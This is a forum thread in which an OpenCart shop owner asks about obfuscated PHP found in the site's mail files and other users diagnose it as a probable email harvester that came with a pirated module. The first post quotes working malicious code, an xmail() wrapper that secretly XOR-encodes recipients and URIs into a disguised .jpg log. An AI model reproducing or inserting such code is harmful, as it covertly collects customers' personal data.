Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Вирус или как?


Leva888

Recommended Posts

Приветствую,

 

Нашел у себя на сайте в system/library/mail.php и в admin/controller/sale/contact.php

вот такой спрятанный код, хотелось бы понять что это такое и откуда оно взялось.

<?php /* 62735f32d0da45a576376b71fcbafb50 */ function xmail () { $a=func_get_args(); file_put_contents('/home/domen/public_html/admin/controller/report/z3o.jpg', x($_SERVER['REQUEST_URI']. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;}?>
Надіслати
Поділитися на інших сайтах


откройте файлик этот ( /home/domen/public_html/admin/controller/report/z3o.jpg ) через блокнот и покажите что в нём.

Надіслати
Поділитися на інших сайтах

Не получается кодом вставить. Пристегнул файл.

 

PS причем после удаления этого кода из указанных файлов скрипт отправки сообщений перестал работать:)

post-18427-0-63272400-1412111158_thumb.jpg

Надіслати
Поділитися на інших сайтах


собирает емайлы покупателей

или запускает как раз таки вирусный файл

взялось откудато

либо старая версия опенкарта

либо фтп взломали

либо либо установили какото модуль который заменил системные файлы

 

лечение: перезалить на оригинальные файлы движка

Надіслати
Поділитися на інших сайтах

Вы блокнотом откройте тот рисунок или поменяйте расшмрение с jpeg на txt и напишите сюда то, что содеожится внутри файла. 

Надіслати
Поділитися на інших сайтах

По поводу откуда взялось.

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

Змінено користувачем AlexFisher
censored
Надіслати
Поділитися на інших сайтах


По поводу откуда взялось.

Перед этим ставил вот этот модуль 

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

ничего удивительного это варезник

продает чужие модули

Надіслати
Поділитися на інших сайтах

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

А вы почаще на варезах модули берите.... тогда у вас такая дыра в безопасности вашего сайта будет, к которую легко влетит средних размеров слон...

...а пока радуйтесь что так легко отделались... хотя это - еще не факт...

Надіслати
Поділитися на інших сайтах


Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

Скорее вас почистят...) половина форума - разработчики, чьи модули, некоторые псевдо-Робин-Гуды сливают на варез....а такие крохоборы-холявщики как вы (простите - ничего личного), их там берут. А потом приходят на форум, где варез очень не любят и жалуются-просят об услугах.  И опять же - не в платном разделе...) т.е. - за спасибо.

Надіслати
Поділитися на інших сайтах


Вот разберешь их где варез, а где нет. Этот модуль хоть и небольших, но денег стоил, а на сайте у продавца не сказано что он варезник поганый.

 

В mail.php был вызов xmail, заменил его здоровым файлом

Змінено користувачем Leva888
Надіслати
Поділитися на інших сайтах


я бы на вашем месте не смог спать спокойно.

1. помимо xmail может быть полно других функций

2. злоумышленник уже мог распихать свои бэкдоры по всему сайту

3. злоумышленник уже мог получить доступ к ftp, панели управления, биллингу

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.